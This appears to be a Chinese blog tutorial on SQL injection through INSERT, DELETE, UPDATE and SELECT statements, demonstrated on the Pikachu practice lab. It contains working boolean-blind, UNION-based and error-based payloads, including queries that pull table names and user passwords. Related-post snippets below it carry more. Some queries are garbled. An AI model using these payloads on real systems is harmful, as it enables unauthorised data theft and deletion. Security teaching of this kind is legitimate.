SQL注入_insert&delete&update&selete

最新推荐文章于 2024-07-30 09:06:39 发布
最新推荐文章于 2024-07-30 09:06:39 发布
阅读量5k 收藏 18
点赞数 2
文章标签: sql web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48131633/article/details/127529801
版权

一. SQL注入介绍

1.1 sql注入概念

1.1.1 sql注入的实质:数据库将用户输入的数据当作代码执行

1.1.2 sql注入产生的条件

  • 用户能控制输入
  • 原本程序要执行的代码,拼接了用户输入的数据然后进行执行

1.2 sql注入注入点判断

1.2.1 判断是否存在可控变量

  • 抓包判断

在这里插入图片描述

如图所示,id=1与submit=%E6%9F%A5%E8%AF%A2都是外部传递变量

1.2.2 判断是否存在与数据库交互

  • 功能判断

如搜索栏、登录框、页面展示等与数据库相关的功能存在与数据库交互

1.2.3 判断过滤是否严谨

  • 传递值后添加’,“或其他杂乱无章的字符查看是否存在变化

1.2.4 判断闭合与功能实现

  • 搜索型:1%" and “%1%”=“1 结论true、1%” and “%1%”="2 结论fales等
  • 展示型:1 and 1=1-- - 结论true、1 and 1=2-- - 结论:fales等

二. insert注入

2.1 insert注入场景

2.1.1 insert函数功能简介:insert在sql语句中代表是往表中添加数据的操作

2.1.2 insert函数注入场景:注册功能、留言功能、添加用户功能等

2.2 insert注入

2.1.1 insert注入介绍:insert由于其功能决定并不会对结论进行直接输出,同时其sql语句预编译是insert型,所以无法使用查询注入的方式进行注入。主要注入方式是盲注、以及报错注入(存在数据库报错信息)

2.1.2 insert布尔盲注使用函数

length(str1) #返回str1字符串长度
left(str1,num) #对字符串str1从左开始数起,返回num个字符
substr(str1,2,1) #对字符串str1从左边第2位开始,截取1位 mid(str1,2,1) #与substr用法相同
ascii(str1) #返回字符串ascii值 ord(str1) #与ascii用法相同
like 模糊匹配(可用正则表达式) regexp #与like类似

2.1.3 insert布尔盲注实列

(1)查看功能
在这里插入图片描述

(2)输入传递值并抓包查看
加粗样式**
由数据包可以看到向服务器传递的变量与变量值
根据注册功能可以得出其sql语句是insert

(3)制作payload

正常注册sql语句:insert into  tablename(username,password,sex,phonenum,email,add)  values ('test',123456,'%E7%94%B7','13371689786','%E5%B9%BF%E4%B8%9C%E6%B7%B1%E5%9C%B3')
注入注册sql语句:insert into  tablename(username,password,sex,phonenum,email,add)  values ('test',123456,'%E7%94%B7','13371689786*',(select 1 where 1=1))-- -)*','%E5%B9%BF%E4%B8%9C%E6%B7%B1%E5%9C%B3')

解析:上述语句对比不同的地方为payload,根据数据库语句规则,若注册sql语句后续payload为’,(select 1 where 1=1))-- -时,则程序正常运行。若注册sql语句后续payload为’,(select 1 where 1=2))-- -时,程序不正常运行。根据true与fales来进行布尔盲注

(4)测试payloa
在这里插入图片描述
在这里插入图片描述

  • 如上图所示,‘,(select 1 where 1=1))-- -与’,(select 1 where 1=2))-- -存在差异,则代表制作的payload有效。当第七位值为true时,注册成功,当第七位值为fales时,注册失败。
  • 可以根据第七位值true或fales进行布尔盲注(后续会讲)
示例payload:email=1',(if(length(database())=x,(select 1 where 1=1),(select 1 where 1=2)))-- -可以遍历数据库长度

缺点:由于测试其差异性需要创建用户,所以sql注入后存在许多测试用户

特性:insert注册功能&selete账户信息功能组成容易造成二阶注入

三. delete注入

3.1 delete注入场景

3.1.1 delete函数功能简介:delete函数主要作用是删除数据库已存在数据

3.1.2 delete注入场景:删除用户,删除留言

3.2 delete注入

3.2.1 delete注入介绍:delete由于其功能决定并不会对结论进行直接输出,同时其sql语句预编译是delete型,所以无法使用查询注入的方式进行注入。主要注入方式是盲注、以及报错注入(存在数据库报错信息)

3.2.2 delete注入常用函数

length(str1) #返回str1字符串长度
left(str1,num) #对字符串str1从左开始数起,返回num个字符
substr(str1,2,1) #对字符串str1从左边第2位开始,截取1位 mid(str1,2,1) #与substr用法相同
ascii(str1) #返回字符串ascii值 ord(str1) #与ascii用法相同
like 模糊匹配(可用正则表达式) regexp #与like类似

3.2.3 delete布尔盲注实列

(1)查看功能
在这里插入图片描述

(2)输入传递值并抓包查看
在这里插入图片描述

(3)构造payload

正常删除sql语句:delete from tablename where id=334

注入删除sql语句:delete from tablename where id=334 and 1=1-- -

解析:根据sql语句当输入payload为 and 1=1-- -时可以正常执行,当注入payload为 and 1=2-- -时不可以正常实现,可根据其true和false来进行布尔盲注(盲注会造成大量的删除功能实现,真实环境容易进局子,切记)

(4)测试payload
在这里插入图片描述
在这里插入图片描述

  • 如上图所示, and 1=1-- -与 and 1=2-- -存在差异,则代表制作的payload有效。当 and 1=1-- -时,删除成功,当 and 1=2-- -时,注册失败。
  • 可以根据删除效果判断true和false,可以据此进行布尔盲注(后续会讲)

四. update注入

3.1 update注入场景

3.1.1 update函数功能简介:update函数主要作用是修改数据库已存在数据

3.1.2 update注入场景:修改密码,修改用户信息

3.2 update注入

3.2.1 update注入介绍:update由于其功能决定并不会对结论进行直接输出,同时其sql语句预编译是update型,所以无法使用查询注入的方式进行注入。主要注入方式是盲注、以及报错注入(存在数据库报错信息)

3.2.2 update注入常用函数

length(str1) #返回str1字符串长度
left(str1,num) #对字符串str1从左开始数起,返回num个字符
substr(str1,2,1) #对字符串str1从左边第2位开始,截取1位 mid(str1,2,1) #与substr用法相同
ascii(str1) #返回字符串ascii值 ord(str1) #与ascii用法相同
like 模糊匹配(可用正则表达式) regexp #与like类似

3.2.3 update布尔盲注实列

(1)查看功能
在这里插入图片描述

(2)输入传递值并抓包查看
在这里插入图片描述

(3)制作payload

正常修改sql语句:update tablename set sex='test2',phonenum='test3',email='test1' where username='test1'
注入修改sql语句:update tablename set sex='test2',phonenum='test3',email='test1' where username='test1' and 1=1-- -' where username='test1'

解析:根据sql语句当输入payload为’ where username=‘test1’ and 1=1-- -时可以正常执行,当注入payload为’ where username=‘test1’ and 1=2-- -时不可以正常实现,可根据其true和false来进行布尔盲注(此payload需要爆破字段username(可以是id或其他,也可以不填更改所有))

(4)测试payload

在这里插入图片描述
在这里插入图片描述

如上图所示,当payload为’ where username=‘test1 ’ and 1=1-- -时,可以将性别修改为test10,当payload为’ where username='test1 ’ and 1=2-- -时,不能将性别修改为test20
可以根据其注册成功和注册失败2种形态进行布尔盲注(后续会讲)

五. selete注入

5.1 selete注入场景

5.1.1 selete函数功能简介:selete函数主要是查询数据库数据,并展示出来

5.1.2 selete注入场景:登录功能,搜索栏,用户信息展示,页面展示,图片展示等

5.2 selete注入

5.2.1 union函数介绍

  • 功能:一条sql语句通过union函数连接可以执行多个查询语句,并使其结果在统一显示表展示
  • 限制:多个sql查询语句的查询字段数需相同(如下例:users表查询主要是查询3个字段(id,username,password),member表查询也需要查询3个字段(id,username,pw))
  • 示例:select id,username,password from users union select id,username,pw
    from member
    在这里插入图片描述

5.2.2 selete注入介绍:selete因为其具有查询功能,并其能显示查询结果。所以部分selete注入可以通过查询结果进行sql注入。主要注入方式有联合查询注入(存在数据库输出),盲注,报错注入(存在报错信息)

5.2.3 selete注入常用函数

selete #联合查询g'n功能
order by #指定列升序排列
concat() #横向合并
group_concat #纵向合并
limit 0,1 #截取字符串
/**/ #注释中间语句,可替代空格
-- - #注释后续语句
#    #注释后续语句

5.2.4 selete注入实列

(1)查看功能
在这里插入图片描述

此功能是根据用户userid展示出用户用户名与邮箱
其功能sql语句:select username,mail from users where userid=$id;

(2)查看请求包外部传参
在这里插入图片描述

上图id与submit都是外部post传参,可能存在注入点

(3)构造测试payload

正常查询sql语句:select username,mail from users where userid=1 limit 0,1
注入查询sql语句:select username,mail from users where userid=1 and 1=1 limit 0,1

(4)测试payload
在这里插入图片描述
在这里插入图片描述

解析:上述传入id值为1 and 1=1时,执行正确,传入1 and 1=2时,执行错误。表示外部传递值对其sql语句进行了影响,并可控。可以根据布尔进行sql注入。由于select具有展示功能,所以也可以进行联合查询注入

(5)联合查询注入获取数据库信息

  • 猜解字段数(由于union函数语法需联合的多个查询语句查询字段数相同,所以需要查询预编译sql语句的字段数)

使用order by 1进行查询,order by 后续值代表第多少列进行升序排列。当数字到达不存在的列时由于无法按规定列升序排列,所以会报错。字段数为最后正常执行order by的后续数字(推荐使用二分法)
在这里插入图片描述

第二行进行升序排列正常执行
在这里插入图片描述

第三行进行升序排列不能正常运行

即原始select语句字段数为2,union查询sql语句也需要为2

  • 查询数据库相关信息

查询显示位(数据库查询出来的数据需要后端语言(php,java)控制显示出来,并不一定全部数据都可以进行显示。同时需要将原有查询语句参数设置为null值,使其查询不到原有查询语句。否则容易遮挡union后续查询语句)
在这里插入图片描述

如上可以看到1,2为显示位

查询数据库名 select database(),2-- -
在这里插入图片描述

可以得数据库名为pikachu

查询用户名:user()

查询数据库版本:version()

  • 查询表

union select table_name,2 from information_schema.tables where table_schema=“pikachu”

解析:就普通的查询information_schema.tables表信息的sql语句。information_schema数据库介绍上篇博客有;本靶场将所有的查询信息都展示。部分真实场景仅仅展示1个。可以使用limit或group_concat()将所有的信息都输出出来
在这里插入图片描述

查询表字段

union select column_name,2 from information_schema.columns where table_name=“users”

解析:查询users表的字段
在这里插入图片描述

查询值

union select username,password where users
在这里插入图片描述

fifteenzz
关注
26-1 SQL 注入攻击 - delete注入
weixin_43263566的博客
03-10 377
因为靶场的源码没有对这个传入的id做过滤,所以这个位置存在注入点,我们先将抓到的删除请求发送到重发器,然后在id后面加上反斜杠再次删除,就会出现sql的错误提示。在 SQL 注入攻击中,常常使用这种方式来构造恶意条件,以绕过原有的查询逻辑。如果后台没有对接收到的 id 参数进行充分的验证和过滤,恶意用户可能会利用这一点进行注入攻击。对于后台来说,delete操作通常是将对应的id传递到后台,然后后台会删除该id对应的数据。: 这是 SQL 中的注释符号,表示后面的内容都是注释,不会被执行。
MySQL数据库之DML数据操纵语言(insertdeleteupdate
Sheenky的博客
04-07 7606
一、数据库插入语句insert DML数据操纵中的插入语句insert,是对数据库中表数据插入数据所用的语句,它的组成是由insert into 表名称 需要插入列名(字段名) 对应字段的数据。 数据库插入语句重点事项: (1)插入的数据条数可以是多条,每条数据用(),()隔开,例如:('张三','男',23,'老师'),('李四','女',20,'学生'),... (2)插入的每条数据中含有的变量个数要与对应插入列的列名个数相同,例如;insert into table(name,gender,a
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQLinsert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
针对INSERT语句的SQL注入
最新发布
qq_69100706的博客
07-30 572
在CTF(Capture The Flag)竞赛中,针对INSERT语句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,主要发生在应用程序接收用户输入并将其插入到数据库中时。如果应用程序没有正确地清理或参数化这些输入,攻击者可以注入恶意SQL代码,从而操纵数据库插入操作,甚至执行其他SQL命令。
Pikachu SQL注入insert/update注入
SS_liang的博客
01-11 1946
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
SQL注入UPDATEinsertdelete注入
07-08 3430
SQL注入
sql server中的insertupdatedelete
blue_mxy的博客
04-19 830
本文用到3张表: student(sno,sname,sage,ssex,sdept)、primary key(sno) sc(sno,cno,score)、primary key(sno,cno) course(cno,cname,cpno,ccredit)、primary key(cno) insertupdatedelete操作对象为: 1. 一个元组 2. 多个元组 3. 全表 ins...
UPDATE/INSERT/DELETE 语句
11-22
在数据库管理中,UPDATEINSERTDELETE 是三个非常重要的 SQL 语句,它们分别用于修改、添加和删除数据。在本实验中,我们将通过实际操作来深入理解这三个语句的用法。 首先,我们来看 `UPDATE` 语句。这个语句...
【快速了解】数据库CREATE|INSERT INTO|DELETE|UPDATE|SELECT|DROP|RENAME|ALTER...
HuanLe.的博客
08-01 1107
常用到的基础数据库语句
SQL练习6 - INSERT / UPDATE / DELETE / NULL / VIEW
咸鱼4号
03-23 2089
插入数据: SQL的数据插入语句INSERT通常有两种形式,一种是插入一个元组,另一种是插入子查询结果。后者可以一次插入多个元组。 1、插入元组: 插入元组的INSERT语句格式为: INSERT INTO<表名>[(<属性列1>[,<属性列2>]…)] VALUES(<常量1>[,<常量2>]…) 其功能是将新元组插入指定表中。其中新元...
SQL注入内容更新.
一个世界一个家,我爱中国!
04-24 910
DECLARE @T VARCHAR(255),@C VARCHAR(255) --声明两个变量DECLARE Table_Cursor CURSOR FOR  --声明游标Select a.name,b.name FROM sysobjects a,syscolumns b --系统对象表与字段表Where a.id=b.id AND a.xtype=u AND (b.xtype=99 or
SQL注入Update注入
weixin_43765321的博客
03-03 5826
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
SQL注入】小白手把手入门SQL注入1-数据库基础
记录并分享学习安全的知识点..
02-18 1157
数据库是“按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。关系型数据库关系型数据库是基于关系模型的数据库系统,使用表格(表)来组织数据。数据以行和列的形式存储在表中,每个表代表一个实体或关系,每一行表示一个数据记录,每一列表示记录的属性。关系型数据库使用结构化查询语言(SQL)进行数据的查询和操作。关系型数据库中表与表之间是有很多复杂的关联关系的常见的关系型数据库有等。非关系型数据库。
MysqlInsertUpdateDelete、Order By、Group By注入
07-21 165
Insert: 语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....) 报错注入insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo'); i...
SQL注入实战:Update注入
ting_liang的博客
01-21 991
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysqlUpdate语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
SQL注入——insert注入(pikachu)
W小哥
01-14 3859
第一步:访问目标网站,点击注册 第二步:填写注册内容并使用burpsuite抓取数据包,右键send toRepeater 第三步:数据包不修改,正常发送,返回内容如下所示 第四步:测试注入点 数据包中注册用户username修改,返回页面如下所示 第五步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,concat(0...
几种SQL注入insertupdatedelete,`, \ 等。。。)
qq_42133828的博客
03-23 8102
insert注入: $sql = "insert into user(username,password) values('$username','$password',)"; payload: 适用于字符型: ' or updatexml(1,concat(0x7e,(database())),0) or ' 适用于数字型: ' or extractva...
SQLinsert注入(4)
qq_41007744的博客
05-06 7758
insert注入第一种情况:插入数据查询如下:insert into table (col1,col2) values ('injectable','not injectable')原始的URL如下:?firstname=john&amp;lastname=smith请求被解析:insert into table (firstname,lastname) values ('john','smith...
sql selete时把两个列合并
06-01
可以使用 CONCAT 函数将两个列合并。例如,假设有一个名为 `users` 的表格,其中包含 `first_name` 和 `last_name` 两个列,可以使用以下 SQL 语句将这两个列合并为一个名为 `full_name` 的新列: ``` SELECT CONCAT(first_name, ' ', last_name) AS full_name FROM users; ``` 这将返回一个包含 `full_name` 列的结果集,其中每一行的值为 `first_name` 和 `last_name` 两列的值合并而成的字符串。注意,中间需要添加一个空格,否则合并的字符串将没有分隔符。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值